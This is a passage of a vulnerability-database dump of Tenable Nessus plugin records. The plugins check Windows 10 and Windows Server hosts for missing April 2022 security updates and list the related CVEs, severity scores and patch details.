"CVE-2022-26919", "CVE-2022-26920"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012647.NASL", "href": "https://www.tenable.com/plugins/nessus/159675", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159675);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012647\");\n script_xref(name:\"MSFT\", value:\"MS22-5012647\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012647: Windows 10 version 1809 / Windows Server 2019 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26790, CVE-2022-26828, CVE-2022-26827, \n CVE-2022-26807, CVE-2022-26796, CVE-2022-26798, \n CVE-2022-26808, CVE-2022-26810, CVE-2022-26803, \n CVE-2022-26802, CVE-2022-26801, CVE-2022-26794, \n CVE-2022-26792, CVE-2022-26904, CVE-2022-26788, \n CVE-2022-26793, CVE-2022-26914, CVE-2022-26789, \n CVE-2022-26797, CVE-2022-26787, CVE-2022-24549, \n CVE-2022-26795, CVE-2022-26786, CVE-2022-24496, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, \n CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, \n CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, \n CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, \n CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831, \n CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26824, \n CVE-2022-26812, CVE-2022-26919, CVE-2022-26918, \n CVE-2022-26809, CVE-2022-26825, CVE-2022-26916, \n CVE-2022-26819, CVE-2022-26817, CVE-2022-26815, \n CVE-2022-26814, CVE-2022-26823, CVE-2022-26811, \n CVE-2022-26829, CVE-2022-26821, CVE-2022-26917, \n CVE-2022-26820, CVE-2022-26826, CVE-2022-26818, \n CVE-2022-26822, CVE-2022-26813, CVE-2022-24545, \n CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, \n CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, \n CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, \n CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26920, CVE-2022-26816, \n CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, \n CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, \n CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012647\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012647\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012647'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012647])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:50", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26786, CVE-2022-26787, CVE-2022-26827, CVE-2022-26789, CVE-2022-26810, CVE-2022-26803, CVE-2022-26802, CVE-2022-26801, CVE-2022-26828, CVE-2022-26808, CVE-2022-26788, CVE-2022-26790, CVE-2022-24549, CVE-2022-26914, CVE-2022-26798, CVE-2022-26795, CVE-2022-26793, CVE-2022-26796, CVE-2022-26904, CVE-2022-26807, CVE-2022-26797, CVE-2022-26794, CVE-2022-26792, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831, CVE-2022-24538, CVE-2022-24484, CVE-2022-23268, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26917, CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26919, CVE-2022-26820, CVE-2022-26830, CVE-2022-26818, CVE-2022-26815, CVE-2022-26809, CVE-2022-26814, CVE-2022-26822, CVE-2022-26829, CVE-2022-26819, CVE-2022-26918, CVE-2022-26826, CVE-2022-26817, CVE-2022-26821, CVE-2022-26813, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26816, CVE-2022-26920, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012604: Windows Server 2022 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23268", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012604.NASL", "href": "https://www.tenable.com/plugins/nessus/159681", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159681);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-22009\",\n \"CVE-2022-23257\",\n \"CVE-2022-23268\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24488\",\n \"CVE-2022-24489\",\n \"CVE-2022-24490\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24537\",\n \"CVE-2022-24538\",\n \"CVE-2022-24539\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26783\",\n \"CVE-2022-26784\",\n \"CVE-2022-26785\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26811\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26816\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26823\",\n \"CVE-2022-26824\",\n \"CVE-2022-26825\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26829\",\n \"CVE-2022-26830\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012604\");\n script_xref(name:\"MSFT\", value:\"MS22-5012604\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012604: Windows Server 2022 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26786, CVE-2022-26787, CVE-2022-26827, \n CVE-2022-26789, CVE-2022-26810, CVE-2022-26803, \n CVE-2022-26802, CVE-2022-26801, CVE-2022-26828, \n CVE-2022-26808, CVE-2022-26788, CVE-2022-26790, \n CVE-2022-24549, CVE-2022-26914, CVE-2022-26798, \n CVE-2022-26795, CVE-2022-26793, CVE-2022-26796, \n CVE-2022-26904, CVE-2022-26807, CVE-2022-26797, \n CVE-2022-26794, CVE-2022-26792, CVE-2022-24496, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, \n CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, \n CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, \n CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, \n CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915, \n CVE-2022-26831, CVE-2022-24538, CVE-2022-24484, \n CVE-2022-23268, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26917, \n CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, \n CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, \n CVE-2022-26919, CVE-2022-26820, CVE-2022-26830, \n CVE-2022-26818, CVE-2022-26815, CVE-2022-26809, \n CVE-2022-26814, CVE-2022-26822, CVE-2022-26829, \n CVE-2022-26819, CVE-2022-26918, CVE-2022-26826, \n CVE-2022-26817, CVE-2022-26821, CVE-2022-26813, \n CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, \n CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, \n CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, \n CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, \n CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, \n CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-26816, CVE-2022-26920, \n CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, \n CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, \n CVE-2022-24483)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012604\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5012604\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012604'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'20348',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012604])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:25", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26789, CVE-2022-26786, CVE-2022-26802, CVE-2022-26803, CVE-2022-26801, CVE-2022-26796, CVE-2022-26787, CVE-2022-26797, CVE-2022-26827, CVE-2022-26810, CVE-2022-26808, CVE-2022-26798, CVE-2022-24549, CVE-2022-26795, CVE-2022-26791, CVE-2022-26794, CVE-2022-26904, CVE-2022-26792, CVE-2022-26807, CVE-2022-26788, CVE-2022-26828, CVE-2022-26790, CVE-2022-26914, CVE-2022-26793, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24488, CVE-2022-24486, CVE-2022-24481, CVE-2022-24479, CVE-2022-24527, CVE-2022-24474, CVE-2022-24521, CVE-2022-24550, CVE-2022-24499, CVE-2022-24547, CVE-2022-24546, CVE-2022-24494, CVE-2022-24542, CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915, CVE-2022-24538, CVE-2022-24484, CVE-2022-26784)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26917, CVE-2022-26916, CVE-2022-26812, CVE-2022-26811, CVE-2022-26919, CVE-2022-26823, CVE-2022-26809, CVE-2022-26824, CVE-2022-26818, CVE-2022-26815, CVE-2022-26814, CVE-2022-26822, CVE-2022-26918, CVE-2022-26829, CVE-2022-26820, CVE-2022-26826, CVE-2022-26819, CVE-2022-26825, CVE-2022-26817, CVE-2022-26821, CVE-2022-26813, CVE-2022-24545, CVE-2022-24541, CVE-2022-24492, CVE-2022-24491, CVE-2022-24537, CVE-2022-24536, CVE-2022-24487, CVE-2022-24534, CVE-2022-24485, CVE-2022-24533, CVE-2022-26903, CVE-2022-24495, CVE-2022-24528, CVE-2022-23257, CVE-2022-21983, CVE-2022-22009, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-26816, CVE-2022-26920, CVE-2022-24493, CVE-2022-24539, CVE-2022-24490, CVE-2022-26783, CVE-2022-26785, CVE-2022-24498, CVE-2022-24483)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012599: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26791", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012599.NASL", "href": "https://www.tenable.com/plugins/nessus/159685", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159685);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-22009\",\n \"CVE-2022-23257\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n 